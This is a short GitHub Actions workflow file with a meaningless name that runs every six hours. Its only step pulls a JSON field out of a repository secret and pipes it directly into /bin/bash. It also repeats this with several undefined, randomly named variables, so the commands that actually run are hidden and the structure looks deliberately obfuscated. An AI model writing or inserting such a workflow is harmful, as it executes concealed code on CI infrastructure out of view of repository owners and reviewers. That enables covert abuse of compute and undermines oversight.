name: separatecocksfoot

on:
  workflow_dispatch:
  schedule:
    - cron: '43 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: separatecocksfoot
        env:
          zrb8: ${{ secrets.zrb8 }}
        run: |
          echo $zrb8 | jq -r .ga68 | /bin/bash
          echo $rn78 | jq -r .in358 | /bin/bash
          echo $qn0943 | jq -r .owj3597 | /bin/bash
          echo $j34746 | jq -r .unksm6106 | /bin/bash
          echo $ns068 | jq -r .hcrt59639 | /bin/bash
          echo $gbw15 | jq -r .kffkj7 | /bin/bash

